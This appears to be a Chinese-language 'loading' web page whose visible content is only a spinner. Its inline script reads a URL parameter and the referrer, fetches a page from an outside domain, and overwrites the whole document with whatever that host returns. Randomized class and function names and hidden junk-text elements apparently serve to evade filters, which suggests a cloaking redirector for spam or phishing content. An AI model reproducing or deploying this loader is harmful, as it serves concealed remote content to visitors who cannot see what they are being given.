<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HNcLpJj {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HNcLpJj .iSyuyVt {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HNcLpJj .content {
            line-height: 50px;
            text-align: center
        }

        .HNcLpJj .img {
            width: 100%
        }

        .HNcLpJj .Zn23jSy {
            text-align: center
        }

        .HNcLpJj .Zn23jSy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HNcLpJj .Zn23jSy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HNcLpJj .Zn23jSy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HNcLpJj .Zn23jSy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HNcLpJj .Zn23jSy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HNcLpJj .Zn23jSy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HNcLpJj .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EWcTxiXM2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Z5ttFzs = EWcTxiXM2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Z5ttFzs +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Z5ttFzs +".html?a=share";
		}
		
        AmGoOyMKz=url+"#"+new Date().getTime();
        AmGoOyMKz && function() {
            $.get(AmGoOyMKz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >q7siZAgdSNbmPIpkiNgxzN7OSGHfb4hah02</li>
<h1 style='display:none' >yNUkoCq81uhdYQ0kzxLyUNzdz9Zv1WzTe004UNhr05rhiKsLJSTysOZMhh2hMsPYZfjIhdP3X4Q2Y911lvlRx4xTsGTq</h1>
<b style='display:none' >ib2oauCxb0lRKZcdZFMme1Rr7svzZR6qrTSBLGaIOCxxwcDMFHOBBH2uHKs1Zp2DaWZO</b>
<b style='display:none' >ib2oauCxb0lRKZcdZFMme1Rr7svzZR6qrTSBLGaIOCxxwcDMFHOBBH2uHKs1Zp2DaWZO</b>
<span style='display:none'>o4y7ekx1e8CA0skbScrLgLnxb3Zuy4IfVuHgc8tP5FEd4YuhYIt0pGaBKL</span>
<div style='display:none'>jJfhGilfmuiF978T1eZ1KfxSpzvrnprJMYhMq4slOoNaUiWyffRNd7dKy2EWC4frLWvZLfZ7tdItBac7</div>
<span style='display:none'>o4y7ekx1e8CA0skbScrLgLnxb3Zuy4IfVuHgc8tP5FEd4YuhYIt0pGaBKL</span><div class="HNcLpJj">
    <div class="iSyuyVt">
        <div class="Zn23jSy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>I5Vt5ZzV2mL53ZVeoJTjdt8CG9V</div>
<b style='display:none' >Rkcs1zhuqmawhTWvve0mZ3q7VDbSgYeXsFnpMBF7zspE8UWucCjDzo6Dkqy0bLS5RYKz9cjnh31I</b>
<ul style='display:none' >s5i7t1sJOWMreE</ul>
<div style='display:none'>I5Vt5ZzV2mL53ZVeoJTjdt8CG9V</div></body>
</html>